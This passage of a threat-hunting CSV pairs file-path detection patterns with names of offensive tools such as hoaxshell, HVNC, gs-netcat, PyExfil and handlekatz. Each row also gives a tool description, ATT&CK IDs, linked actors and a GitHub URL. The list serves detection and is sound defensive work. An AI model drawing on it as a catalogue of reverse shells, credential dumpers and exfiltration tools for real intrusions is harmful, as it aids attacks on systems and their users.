fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\groupmembership.py*",".{0,1000}\\groupmembership\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\gs-netcat ",".{0,1000}\\gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection 
with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*\gs-sftp*",".{0,1000}\\gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*\gtfonow.py*",".{0,1000}\\gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*\GzipB64.exe*",".{0,1000}\\GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*\hack.ps1*",".{0,1000}\\hack\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*\HackBrowserData*",".{0,1000}\\HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*\Hades.exe*",".{0,1000}\\Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" 
"*\hades.exe*",".{0,1000}\\hades\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*\hades-main.zip*",".{0,1000}\\hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*\HandleHijacker.cpp*",".{0,1000}\\HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\HandleHijacker.hpp*",".{0,1000}\\HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\handlekatz.exe*",".{0,1000}\\handlekatz\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\handlekatz.py*",".{0,1000}\\handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec 
(a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\harvest.cmb*",".{0,1000}\\harvest\.cmb.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\hash_spider.py*",".{0,1000}\\hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\hashview.py*",".{0,1000}\\hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*\HellsHall.c*",".{0,1000}\\HellsHall\.c.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\HellsHall.exe*",".{0,1000}\\HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\HellsHall.h*",".{0,1000}\\HellsHall\.h.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\heroinn_client\*",".{0,1000}\\heroinn_client\\.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*\HiddenDesktop.h*",".{0,1000}\\HiddenDesktop\.h.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HiddenDesktop\*",".{0,1000}\\HiddenDesktop\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*\HijackablePaths.cs*",".{0,1000}\\HijackablePaths\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\HijackDLL-CreateRemoteThread.*",".{0,1000}\\HijackDLL\-CreateRemoteThread\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\HijackDLL-CreateRemoteThread\*",".{0,1000}\\HijackDLL\-CreateRemoteThread\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\HijackDll-Process.*",".{0,1000}\\HijackDll\-Process\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\HijackDLL-Threads.*",".{0,1000}\\HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\hijacker_app\src\ProxyApp.exe*",".{0,1000}\\hijacker_app\\src\\ProxyApp\.exe.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*\hijackers\*",".{0,1000}\\hijackers\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*\HijackHunter\*",".{0,1000}\\HijackHunter\\.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\hiphp-cli.sh*",".{0,1000}\\hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*\hiphp-desktop.sh*",".{0,1000}\\hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*\HiveDump.ps1*",".{0,1000}\\HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\hoaxshell\*.py*",".{0,1000}\\hoaxshell\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*\HookDetector.csproj*",".{0,1000}\\HookDetector\.csproj.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\HookDetector.exe*",".{0,1000}\\HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\HostRecon.ps1*",".{0,1000}\\HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\HTMLSmuggler\*",".{0,1000}\\HTMLSmuggler\\.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*\http_exfiltration.py*",".{0,1000}\\http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data 
Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\http_SCNotification.exe",".{0,1000}\\http_SCNotification\.exe","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\httprelayserver.py*",".{0,1000}\\httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*\http-request-smuggler\*",".{0,1000}\\http\-request\-smuggler\\.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*\huan.exe *",".{0,1000}\\huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*\hvnc.exe*",".{0,1000}\\hvnc\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC.sln*",".{0,1000}\\HVNC\.sln.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC.vcxproj*",".{0,1000}\\HVNC\.vcxproj.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC-main.zip*",".{0,1000}\\HVNC\-main\.zip.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC-Server.exe*",".{0,1000}\\HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 
- TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\HWSyscalls.cpp*",".{0,1000}\\HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\HWSyscalls-Example.*",".{0,1000}\\HWSyscalls\-Example\..{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\hXOR.exe*",".{0,1000}\\hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\hXOR-Packer v0.1\*",".{0,1000}\\hXOR\-Packer\sv0\.1\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\hXOR-Packer\*",".{0,1000}\\hXOR\-Packer\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - 